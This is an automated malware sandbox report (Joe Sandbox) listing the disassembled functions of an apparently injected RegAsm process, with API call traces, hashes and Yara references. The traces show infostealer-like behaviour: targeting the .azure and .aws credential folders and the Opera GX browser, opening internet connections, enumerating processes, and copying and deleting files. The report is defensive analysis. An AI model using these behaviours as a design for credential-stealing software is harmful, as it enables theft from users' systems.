                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                                  • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                                  • API String ID: 3676486918-1022791448
                                                                                                                                                                                                                                                                  • Opcode ID: 86c93f790c1139873df2db04b142e598c3904f527e3a34d2d5c910b06c72e4bf
                                                                                                                                                                                                                                                                  • Instruction ID: e5cc5c65de5cc60b7b6cdd87f80c658bf6621385db3094b700855a13b31abe2f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86c93f790c1139873df2db04b142e598c3904f527e3a34d2d5c910b06c72e4bf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44F05479240348FFEB105B91DD4FFAF7A7DEB46B04F201069F701A9090EBB569809B64
                                                                                                                                                                                                                                                                  Function 00416A63 Relevance: 8.2, APIs: 5, Instructions: 653networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00416A68
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 004134F2: _EH_prolog.MSVCRT ref: 004134F7
                                                                                                                                                                                                                                                                    • Part of subcall function 004135A1: _EH_prolog.MSVCRT ref: 004135A6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrlenA.KERNEL32(?,00000000,?,00416ABD,004265A7,004265A6,00000000,00000000,?,0041740F), ref: 0040F9E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrcpy.KERNEL32(00000000,00000000), ref: 0040FA1B
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32(74DD0000,00416BAD), ref: 004177BF
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004177D6
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004177ED
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417804
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 0041781B
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417832
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417849
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417860
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417877
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 0041788E
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004178A5
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004178BC
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004178D3
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004178EA
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417901
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417918
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 0041792F
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417946
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 0041795D
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417974
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 0041798B
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004179A2
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004179B9
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004179D0
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004135DE,004135DE,?,004265AB,00000000,?,00000040,00000064,0041365F,00412CF8,?,0000002C,00000064), ref: 00416C56
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00413901: _EH_prolog.MSVCRT ref: 00413906
                                                                                                                                                                                                                                                                    • Part of subcall function 0041328A: _EH_prolog.MSVCRT ref: 0041328F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416D3B
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416D57
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: _EH_prolog.MSVCRT ref: 0041052A
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 0041054D
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0041057F
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 004105C2
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004105C9
                                                                                                                                                                                                                                                                    • Part of subcall function 00403B1E: _EH_prolog.MSVCRT ref: 00403B23
                                                                                                                                                                                                                                                                    • Part of subcall function 00403B1E: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BCE
                                                                                                                                                                                                                                                                    • Part of subcall function 00403B1E: StrCmpCA.SHLWAPI(?), ref: 00403BE5
                                                                                                                                                                                                                                                                    • Part of subcall function 00411CBE: _EH_prolog.MSVCRT ref: 00411CC3
                                                                                                                                                                                                                                                                    • Part of subcall function 00411CBE: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416DD2), ref: 00411CE5
                                                                                                                                                                                                                                                                    • Part of subcall function 00411CBE: ExitProcess.KERNEL32 ref: 00411CF0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040ED4F: _EH_prolog.MSVCRT ref: 0040ED54
                                                                                                                                                                                                                                                                    • Part of subcall function 0040ED4F: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED98
                                                                                                                                                                                                                                                                    • Part of subcall function 0040ED4F: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EE0C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040518A: _EH_prolog.MSVCRT ref: 0040518F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040518A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040523A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040518A: StrCmpCA.SHLWAPI(?), ref: 00405251
                                                                                                                                                                                                                                                                    • Part of subcall function 004117AA: _EH_prolog.MSVCRT ref: 004117AF
                                                                                                                                                                                                                                                                    • Part of subcall function 004117AA: strtok_s.MSVCRT ref: 004117D6
                                                                                                                                                                                                                                                                    • Part of subcall function 004117AA: StrCmpCA.SHLWAPI(00000000,00426560,?,?,?,?,00416FBB), ref: 00411807
                                                                                                                                                                                                                                                                    • Part of subcall function 004117AA: strtok_s.MSVCRT ref: 00411868
                                                                                                                                                                                                                                                                    • Part of subcall function 00401ED6: _EH_prolog.MSVCRT ref: 00401EDB
                                                                                                                                                                                                                                                                    • Part of subcall function 004166DD: _EH_prolog.MSVCRT ref: 004166E2
                                                                                                                                                                                                                                                                    • Part of subcall function 004166DD: lstrcat.KERNEL32(?,00000000), ref: 00416724
                                                                                                                                                                                                                                                                    • Part of subcall function 004166DD: lstrcat.KERNEL32(?), ref: 00416743
                                                                                                                                                                                                                                                                    • Part of subcall function 00416895: _EH_prolog.MSVCRT ref: 0041689A
                                                                                                                                                                                                                                                                    • Part of subcall function 00416895: memset.MSVCRT ref: 004168BA
                                                                                                                                                                                                                                                                    • Part of subcall function 00416895: lstrcat.KERNEL32(?,00000000), ref: 004168E0
                                                                                                                                                                                                                                                                    • Part of subcall function 00416895: lstrcat.KERNEL32(?,\.azure\), ref: 004168FD
                                                                                                                                                                                                                                                                    • Part of subcall function 00416895: memset.MSVCRT ref: 00416938
                                                                                                                                                                                                                                                                    • Part of subcall function 00416895: lstrcat.KERNEL32(?,00000000), ref: 00416963
                                                                                                                                                                                                                                                                    • Part of subcall function 00416895: lstrcat.KERNEL32(?,\.aws\), ref: 00416980
                                                                                                                                                                                                                                                                    • Part of subcall function 00416895: memset.MSVCRT ref: 004169BB
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$H_prolog$lstrcat$lstrcpy$InternetOpen$memset$DirectoryHeapProcesslstrlenstrtok_s$AllocCreateExitInformationSystemTimeVolumeWindows
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1955031769-0
                                                                                                                                                                                                                                                                  • Opcode ID: 82171306bb89cb5157dff4500ef4cc0e1125d8cc62b2e6a8852130d891592033
                                                                                                                                                                                                                                                                  • Instruction ID: e97125967b99c46d691800fc12de2d2ca7e8c28e0fbf8f954d281027c297ae7b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82171306bb89cb5157dff4500ef4cc0e1125d8cc62b2e6a8852130d891592033
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9425371D00358AADF10EBA5C946BDEBB79AF15304F5041AFF40973281DB785B888BA7
                                                                                                                                                                                                                                                                  Function 00409191 Relevance: 7.8, APIs: 5, Instructions: 274filestringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00409196
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425E0C,?,?,?,00425BF3,00000000), ref: 00409270
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00409437
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040944B
                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 004094CD
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3423466546-0
                                                                                                                                                                                                                                                                  • Opcode ID: 83f8898950d36f834607ea7444567a5f3845c9d33cf5da685d5416aeb03bc42b
                                                                                                                                                                                                                                                                  • Instruction ID: 5ced7a88228f493ea16d9537100e41b991271ef278653413e24c3cef79d6a372
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83f8898950d36f834607ea7444567a5f3845c9d33cf5da685d5416aeb03bc42b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBB16971904248EADB15EBE4D955BEDBBB4AF19318F24407EE406735C2EB781B0CCB26
                                                                                                                                                                                                                                                                  Function 0041030B Relevance: 7.6, APIs: 5, Instructions: 70processCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00410310
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041034B
                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 0041035C
                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(?,00000128), ref: 004103C4
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000000), ref: 004103D1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 599723951-0
                                                                                                                                                                                                                                                                  • Opcode ID: 06fa9110ee9d507ba72b29fb23e12d6fd783d619332ad638db9b21ee54365338
                                                                                                                                                                                                                                                                  • Instruction ID: 22475dcb54cdd2774e84e94c6ee44a8dbe55ee64fdd3e2755a2df150d84e7281
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06fa9110ee9d507ba72b29fb23e12d6fd783d619332ad638db9b21ee54365338
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14213071A01218EBCB10EFA5C945AEEFBB9BF58305F10407FE515F3291CB784A488B65
                                                                                                                                                                                                                                                                  Function 004024FF Relevance: 7.5, APIs: 5, Instructions: 39memorystringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00402518
                                                                                                                                                                                                                                                                    • Part of subcall function 00402484: memset.MSVCRT ref: 004024A9
                                                                                                                                                                                                                                                                    • Part of subcall function 00402484: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024CF
                                                                                                                                                                                                                                                                    • Part of subcall function 00402484: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024E9
                                                                                                                                                                                                                                                                  • strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 0040252D
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402538
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040253F
                                                                                                                                                                                                                                                                    • Part of subcall function 00402330: ??_U@YAPAXI@Z.MSVCRT ref: 004023B5
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00402568
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3248666761-0
                                                                                                                                                                                                                                                                  • Opcode ID: 325aaa65a079ecf38a918b20200b9907c410b030a998a7ebbf961c587197409a
                                                                                                                                                                                                                                                                  • Instruction ID: 98973f6b3243243354801e9c5a181f7e3a8590276e79871fbea587f261376133
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 325aaa65a079ecf38a918b20200b9907c410b030a998a7ebbf961c587197409a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BF068B2C00118B7CB10B7A4DD05FCE777C9F14304F0000A6B945F2092DDB497D48BA8
                                                                                                                                                                                                                                                                  Function 0040D708 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 454COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040D70D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX,00425C1E,00425C1B,?,?,?), ref: 0040D757
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: _EH_prolog.MSVCRT ref: 00410CC8
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: GetFileAttributesA.KERNEL32(00000000,?,0040BB15,?,00425C4E,?,?), ref: 00410CDC
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: _EH_prolog.MSVCRT ref: 0040C1DF
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C232
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: memcmp.MSVCRT ref: 0040C270
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
